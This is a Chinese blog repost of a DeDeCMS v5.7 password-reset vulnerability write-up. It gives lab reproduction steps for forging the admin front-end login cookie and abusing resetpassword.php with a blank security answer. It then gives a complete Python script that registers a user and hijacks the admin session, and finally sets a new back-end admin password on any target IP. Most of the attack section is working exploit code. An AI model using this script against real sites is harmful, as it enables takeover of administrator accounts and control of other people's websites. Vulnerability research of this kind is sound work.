2. 程式人生 > >DeDeCMS v5.7 密碼修改漏洞(附PoC)

DeDeCMS v5.7 密碼修改漏洞(附PoC)

阿新 發佈:2018-11-15

原文:https://paper.seebug.org/507/
參考:
https://xz.aliyun.com/t/1959
https://xz.aliyun.com/t/1961

安裝

注意安裝之後,註冊會員預設是需要後臺admin稽核的,這裡需要admin在後臺修改一下配置:
然而在系統設定》系統基本引數的地方無法顯示,找error.log發現是:
在這裡插入圖片描述
就是呼叫了is_php()這個函式,而該函式並沒有定義,
搜尋發現只有一個地方呼叫了include/common.func.php,直接刪掉這裡的呼叫即可。
在這裡插入圖片描述
由於admin無法前臺登入,所以需要先拿到admin的前臺許可權。

先拿到admin的前臺許可權

1.註冊0000001使用者名稱的賬號
稽核通過(或者設定為不需稽核)
2. 訪問/member/index.php?uid=0000001
注意只有訪問了/member/index.php?uid=0000001才會生成相應的所需的cookie
在這裡插入圖片描述
從圖中可以看出已經set-cookie了。
3.獲取cookie中last_vid_ckMd5值,設定DeDeUserID_ckMd5為剛才獲取的值,並設定DedeUserID為0000001。然後訪問/member/
在這裡插入圖片描述
4.向 /member/resetpassword.php傳送POST請求:

dopost=safequestion&safequestion=0.0&safeanswer=&id=1

訪問從burp中拿到的連結,重置admin前臺密碼:
在這裡插入圖片描述

http://192.168.170.139/member/resetpassword.php?dopost=getpasswd&id=1&key=KjK01TPb

在這裡插入圖片描述
直接訪問該連結,即可重置admin前臺為任意密碼。
重置admin前臺密碼之後,注意不要退出,繼續留著cookie,繼續進行修改admin後臺密碼。

修改admin後密碼

訪問:系統設定-> 個人資料 -> 基本資料

http://192.168.170.139/member/edit_baseinfo.php

在這裡插入圖片描述
然後使用新的修改後的密碼即可成功登入admin後臺:
在這裡插入圖片描述

自動指令碼必須在以下情況下才能成功:
1.是否開啟會員功能: 設定為是
2.註冊是否需要完成詳細資料的填寫 設定為否;
3.會員使用許可權開通狀態 設定為0(-10 郵件驗證 -1 手工稽核, 0 沒限制):

指令碼:

# coding=utf-8
#基於:https://xz.aliyun.com/t/1961
#參考:https://paper.seebug.org/507/
#正則參考:https://www.cnblogs.com/chuxiuhong/p/5907484.html
# 兩步的驗證碼1.jpg, 2.jpg需手動輸入
import requests
import re
import sys
import signal



if __name__ == "__main__":
    if len(sys.argv) <=1:
        exit("[!] 請輸入正確的IP格式")
    ip = sys.argv[1]
    dede_host = "http://{ip}/".format(ip=ip)
    oldpwd = '123456'
    newpwd = "cnvdcnvd"
    s = requests.Session()
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'https://127.0.0.1:8080',
    }
    rs = requests.get(dede_host + 'member/reg_new.php')
    if '系統關閉了會員功能' in rs.content:
        exit('The system has closed the member function .Can not attack !!!')

    headers = {"Referer": dede_host + "member/reg_new.php"}
    # 第一步:獲取註冊頁面的驗證碼
    rs = s.get(dede_host + 'include/vdimgck.php').content  #這個php是用來生成驗證碼的
    file = open('1.jpg', "wb")
    file.write(rs)
    file.close()

    vdcode = raw_input("Please enter the registration verification code : ")

    userid = '0000001'
    uname = '0000001'
    userpwd = '123456'


    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0)",
               "Content-Type": "application/x-www-form-urlencoded"}
    data = "dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid={userid}&uname={uname}&userpwd={userpwd}&userpwdok={userpwd}&email=0000001%400000001.com&safequestion=0&safeanswer=&sex=%E7%94%B7&vdcode={vdcode}&agree=".format(
        userid=userid, uname=uname, userpwd=userpwd, vdcode=vdcode)
    # 第二步:提交註冊頁面,註冊0000001的使用者
    rs = s.post(dede_host + '/member/reg_new.php', data=data, headers=headers)
    if "驗證碼錯誤" in rs.content:
        exit("[!] Verification code error, account registration failed")
    elif '註冊成功' in rs.content:
        print '[*] registration success !!'
    
    # 第三步:訪問/member/index.php?uid=0000001 得到所需的cookie: last_vid__ckMd5
    rs = s.get(dede_host + "/member/index.php?uid={userid}".format(userid=userid))
    if "資料尚未通過稽核" in rs.content:
        exit("[!] User information has not been approved !!!")  # 會員使用許可權開通狀態(-10 郵件驗證 -1 手工稽核, 0 沒限制):
    searchObj = re.search(r'last_vid__ckMd5=(.*?);', rs.headers['Set-Cookie'], re.M | re.I)
    last_vid__ckMd5 = searchObj.group(1)
    s.cookies['DedeUserID'] = userid
    s.cookies['DedeUserID__ckMd5'] = last_vid__ckMd5
    # 第四步:驗證admin前臺登入成功
    rs = s.get(dede_host + "/member/index.php")
    if "class=\"userName\">admin</a>" in rs.text:
        print "[*] Administrator login successful !!"

    # 第五步:得到可修改admin前臺登陸密碼的url
    data = {"dopost": "safequestion", "safequestion": "0.0", "safeanswer": "", "id": "1"}
    rs = s.post(dede_host + 'member/resetpassword.php', data=data)
    if "請10分鐘後再重新申請" in rs.content:
        print "[!] 對不起,請10分鐘後再重新申請"
        exit()
    key = re.search(r"(?<=key=)[a-zA-Z0-9]{8}(?=')", rs.content, re.M).group()
    rs = s.get(dede_host + 'member/resetpassword.php?dopost=getpasswd&id=1&key={key}'.format(key=key))
    if "找回密碼第二步" in rs.content:
        data = {"dopost":"getpasswd", "setp": "2", "id": "1", "userid": "admin", "key": key, "pwd": oldpwd, "pwdok": oldpwd}
        s.post(dede_host + 'member/resetpassword.php', data=data)
    # 第六步:拿到帶有key的連結修改admin前臺登入密碼
    if "更改密碼成功" in rs.content:
        print "[*] Password changed succuessfully!"
    # 第七步:修改admin後臺登入密碼
    headers = {"Referer": dede_host + "member/edit_baseinfo.php"}
    rs = s.get(dede_host + 'include/vdimgck.php').content
    file = open('2.jpg', "wb")
    file.write(rs)
    file.close()

    vdcode = raw_input("Please enter the verification code : ")

    data = {"dopost": "save", "uname": "admin", "oldpwd": oldpwd, "userpwd": newpwd, "userpwdok": newpwd,
            "safequestion": "0", "newsafequestion": "0", "sex": "男", "email": "[email protected]", "vdcode": vdcode}
    rs = s.post(dede_host + '/member/edit_baseinfo.php', data=data, proxies=proxies)
    if "成功更新你的基本資料" in  rs.content:
       print "[*] Administrator password modified successfully !!"
       print "[*] The new administrator password is : " + newpwd
    else:
        print "[!] attack fail"

在這裡插入圖片描述

相關推薦

DeDeCMS v5.7 密碼修改漏洞PoC

原文:https://paper.seebug.org/507/ 參考: https://xz.aliyun.com/t/1959 https://xz.aliyun.com/t/1961 安裝 注意安裝之後,註冊會員預設是需要後臺admin稽核的,這裡需要admin在後臺修改一

DeDeCMS v5.7 密碼修改漏洞

先拿到admin的前臺許可權 1.註冊0000001使用者名稱的賬號 稽核通過(或者設定為不需稽核) 2. 訪問/member/index.php?uid=0000001。 注意只有訪問了/membe

5_CentOS 7 基本命令操作單詞

1.Linux 終端介紹 Shell 提示符 Bash Shell 基本語法 2.基本命令的使用:ls、pwd、cd 3.基本系統和 BIOS 硬體時間 4.Linux 如何獲得幫助,Linux 關機命令:shutdown、init 等 5.Linux 7個啟動級別,設定伺服器在定時自動開機 &nb

DiscuzX3.1標籤TAG目錄化偽靜態修改教程規則

使用discuz論壇的站長都知道discuz論壇系統不支援對TAG的偽靜態,網上搜一下Discuz標籤偽靜態教程是很多,但是大多是針對2.5做的修改,今天酷米論壇站長分享一個針對DiscuzX3.1最新版TAG目錄化偽靜態,偽靜態與目錄化偽靜態哪一個好大家可以看看《百度搜索

dedecms v5.7 sp2前臺任意使用者登入包括管理員

dedecms v5.7 sp2前臺任意使用者登入(包括管理員) 前言 我們繼續來說一下dedecms最新的幾個漏洞,今天是一個前臺任意使用者登入的漏洞,該漏洞結合上一次提到的前臺任意密碼修改漏洞可以直接修改管理員的密碼,剩下的就是找後臺了,廢話不多說,我們開始吧 漏洞版本

CVE-2018-20129:DedeCMS V5.7 SP2前臺檔案上傳漏洞

一、漏洞摘要 漏洞名稱: DedeCMS V5.7 SP2前臺檔案上傳漏洞上報日期: 2018-12-11漏洞發現者: 陳燦華產品首頁: http://www.dedecms.com/軟體連結: http://updatenew.dedecms.com/base-v57/packa

CVE-2018-20129:DedeCMS V5.7 SP2前臺文件上傳漏洞

oba sid img name multi def close -a 代碼 一、漏洞摘要 漏洞名稱: DedeCMS V5.7 SP2前臺文件上傳漏洞上報日期: 2018-12-11漏洞發現者: 陳燦華產品首頁: http://www.dedecms.com/軟件鏈接:

CVE-2018-20129-——DedeCMS V5.7 SP2前臺檔案上傳漏洞

0x01 漏洞概述 Desdev DedeCMS(織夢內容管理系統)是中國卓卓網路(Desdev)科技有限公司的一套開源的集內容釋出、編輯、管理檢索等於一體的PHP網站內容管理系統(CMS)。 Desdev DedeCMS 5.7 SP2版本中的uploads/include/dial

程式碼審計| DEDECMS -V5.7-UTF8-SP2-20180109漏洞集合

最近dedeCMS爆了好多洞(0day),於是將最近的漏洞進行復現和整理便成為了本篇漏洞集合。 最近dedeCMS爆了好多洞(0day),於是將最近的漏洞進行復現和整理便成為了本篇漏洞集合。期待師傅們的指導與交流。 cookie偽造導致任意前臺使用者登入 0×00 相關環境

代碼審計-DedeCMS-V5.7前臺任意用戶密碼重置

漏洞分析 cti question 兩個 int 等於 允許 浮點 rdquo 0x01 漏洞影響 該漏洞允許攻擊者修改任意前臺用戶密碼。 0x02 漏洞利用條件 1,開啟會員模塊 2,攻擊者擁有一個正常的會員賬號 3,目標沒有設置安全問題 0x03

DedeCMS V5.7 SP2前臺檔案上傳漏洞(CVE-2018-20129)

DedeCMS V5.7 SP2前臺檔案上傳漏洞(CVE-2018-20129) 一、漏洞描述 織夢內容管理系統(Dedecms)是一款PHP開源網站管理系統。Dedecms V5.7 SP2版本中的uploads/include/dialog/select_images_post.php檔案存在檔案上傳漏洞

Dedecms v5.7 CKEditor編輯器回車將<br>和<div>改了<p>的解決方法

dedecms 編輯器Dedecms v5.7 SP1的Ckeditor編輯器有些改動,默認為回車鍵換行、Shift+Enter換段落,但各位站長朋友都習慣了直接敲回車換段落,查看後發現它的配置文件裏是可以修改解決的,其實你可以把下面的代碼註釋掉就可以采用另外一種模式了(enter換段落):1、找到:安裝目

Redis 未授權訪問漏洞Python腳本

dir for return -s src acl save 密碼 password 0x01 環境搭建 #下載並安裝 cd /tmp wget http://download.redis.io/releases/redis-2.8.17.tar.gz tar xzf r

Centos7.3 mysql5.7 密碼修改及遠程登陸配置

改密碼 遠程 error 遠程連接 連接 safe trie 5.7 sql 修改密碼命令 set password for root@localhost = password(‘admin@123‘); 連接命令 ln -s /usr/local/mysql/bin

乾貨原始碼 | 爬取一萬條b站評論,分析9.7分的新番憑啥這麼火?

7月番《工作細胞》最終話在十一前放出。這部動漫在b站上評分高達9.7。除了口碑之外,熱度也居高不下,更值得關注的是連很多平時不關注動漫的小夥伴也加入了追番大軍。這次我們的目標是爬取b站上的所有短評進行分析,用資料說明為什麼這部動漫會如此受歡迎。 01 工作細胞 《工作細胞》

dedecms V5.7 SP2 web後臺getshell

1後臺getshell https://www.freebuf.com/vuls/164035.html https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS V5.7 SP2後臺存在程式碼執行漏洞 ded

樹狀陣列的建立,修改,求和程式碼展示例題

樹狀陣列是一個查詢和修改複雜度都為log(n)的資料結構。主要用於查詢任意兩位之間的所有元素之和,但是每次只能修改一個元素的值;經過簡單修改可以在log(n)的複雜度下進行範圍修改,但是這時只能查詢其中一個元素的值(如果加入多個輔助陣列則可以實現區間修改與區間查詢)。(以上來

小姐姐帶你一起學:如何用Python實現7種機器學習演算法程式碼

編譯 | 林椿眄出品 | AI科技大本營(公眾號ID:rgznai100)【AI科技大本營導讀】

Oracle11G密碼180天預設值過期後的修改方法

Oracle11G密碼180天(預設值)過期後的修改方法。在Oracle 11G 建立使用者時預設密碼過期限制是180天, 如果超過180天使用者密碼未做修改則該使用者無法登入,下面與大家分享下修改方法,具體方法如下: 由於Oracle11G的新特性所致,經常會遇到使用sq

Tomcat曝本地提權漏洞 CVE-2016-1240 PoC

就在各位歡度國慶的時候,Tomcat於10月1日曝出本地提權漏洞CVE-2016-1240。僅需Tomcat使用者低許可權,攻擊者就能利用該漏洞獲取到系統的ROOT許可權。而且該漏洞的利用難度並不大,受影響的使用者需要特別關注。 Tomcat是個執行在Apache上的應用伺